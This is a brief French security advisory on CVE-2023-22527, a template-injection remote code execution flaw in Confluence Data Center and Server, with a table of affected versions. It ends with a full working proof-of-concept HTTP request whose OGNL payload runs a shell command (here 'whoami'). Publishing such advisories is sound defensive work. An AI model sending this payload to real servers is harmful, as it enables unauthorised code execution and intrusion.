
Une vulnérabilité critique d'exécution de code à distance (RCE) de sévérité critique (CVE-2023-22527) a été découverte dans Confluence Server et Data Center.
Une vulnérabilité d'injection de template sur les anciennes versions de Confluence Data Center et Server permet à un attaquant non authentifié d'obtenir une exécution de code à distance (RCE) sur une instance affectée. Les clients utilisant une version affectée doivent prendre des mesures immédiates. Les versions les plus récentes prises en charge de Confluence Data Center et Server ne sont pas affectées par cette vulnérabilité, car elle a finalement été atténuée lors des mises à jour régulières. Cependant, Atlassian recommande aux clients de veiller à installer la dernière version pour protéger leurs instances contre les vulnérabilités non critiques décrites dans le bulletin de sécurité de janvier d'Atlassian.
| Produit | Versions affectées |
|---|
| Confluence Data Center et Server | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
